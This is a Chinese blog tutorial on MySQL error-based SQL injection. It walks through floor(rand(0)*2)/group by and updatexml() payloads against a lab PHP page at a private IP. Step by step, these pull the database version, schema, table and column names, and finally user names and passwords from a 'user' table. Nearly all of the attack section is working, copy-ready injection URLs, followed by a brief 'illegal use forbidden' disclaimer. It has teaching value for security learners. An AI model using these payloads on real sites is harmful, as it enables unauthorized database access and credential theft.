首页 > 其他分享 >报错注入

报错注入

时间:2022-12-26 20:37:06浏览次数:40  
标签:information 0.104 0x7e 报错 concat 注入 select schema


不是我不想,你上学我上班,我耽误你前程似锦,你耽误我成家立业,我的眼里都是烟花和生活,你的眼里都是未来和希望。。。

----  网易云热评

一、相关函数

1、rand():产生一个0-1之间随机数,rand(0),随机产生一个0-1的随机数,运行多次产生的结果一样

2、floor():向下取整,floor(rand()*2),随机产生0和1两个数

3、group by:分组排列

4、count(*):统计数量

报错注入_web安全

5、concat():将字符串连接起来

 

 

 

二、通过floor()函数构造注入语句

1、访问​​http://192.168.0.104/aiyou/bczr.php?id=2​​,返回正常页面

报错注入_bc_02

2、访问​​http://192.168.0.104/aiyou/bczr.php?id=2​​',返回错误页面

报错注入_mysql_03

3、构造闭合语句,192.168.0.104/aiyou/bczr.php?id=2' --+,页面返回正常

4、获取数据库版本

192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,(version()))x from information_schema.tables group by x )a) --+

 

报错注入_mysql_04

5、获取数据库名称

192.168.0.104/aiyou/bczr.php?id=2' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,database(),0x23)x from information_schema.tables group by x )a) --+

 

6、获取其他数据库名称(修改红色数字,获取不同数据库名)

​http://192.168.0.104/aiyou/bczr.php?id=2​​' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

 

7、获取表名(修改红色数字,获取不同表名)

http://192.168.0.104/aiyou/bczr.php?id=2' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

 

8、获取字段名,需要指定表名,表名用十六进制表示,修改红色数字获取不同字段

​http://192.168.0.104/aiyou/bczr.php?id=2​​' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x75736572 LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

报错注入_web安全_05

 

9、获取字段内容

​http://192.168.0.104/aiyou/bczr.php?id=2​​' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,name,0x3a,pass,0x23) FROM user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

--+

报错注入_mysql_06

 

三、通过updatexml函数构造注入语句

1、获取数据库名称(通过修改红色数字获取不同的数据库名称)

​http://192.168.0.104/aiyou/bczr.php?id=2​​' and updatexml(1,(select concat(0x7e, (schema_name),0x7e) FROM information_schema.schemata limit 5,1),1) -- +

2、获取表名(通过修改红色数字获取不同的表名)

​http://192.168.0.104/aiyou/bczr.php?id=2​​' and updatexml(1,(select concat(0x7e, (table_name),0x7e) from information_schema.tables where table_schema='jay' limit 1,1),1) -- +

3、获取字段名(通过修改红色数字获取不同的字段)

​http://192.168.0.104/aiyou/bczr.php?id=2​​' and updatexml(1,(select concat(0x7e, (column_name),0x7e) from information_schema.columns where table_name=0x75736572 limit 1,1),1) -- +

4、获取字段内容(修改红色数字,获取不同字段内容)

​http://192.168.0.104/aiyou/bczr.php?id=2​​' and updatexml(1,(select concat(0x7e, pass,0x7e,name,0x7e) from user limit 1,1),1) -- +

报错注入_web安全_07

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

报错注入_报错注入_08

 

标签:information,0.104,0x7e,报错,concat,注入,select,schema
From: https://blog.51cto.com/u_15288375/5970867

相关文章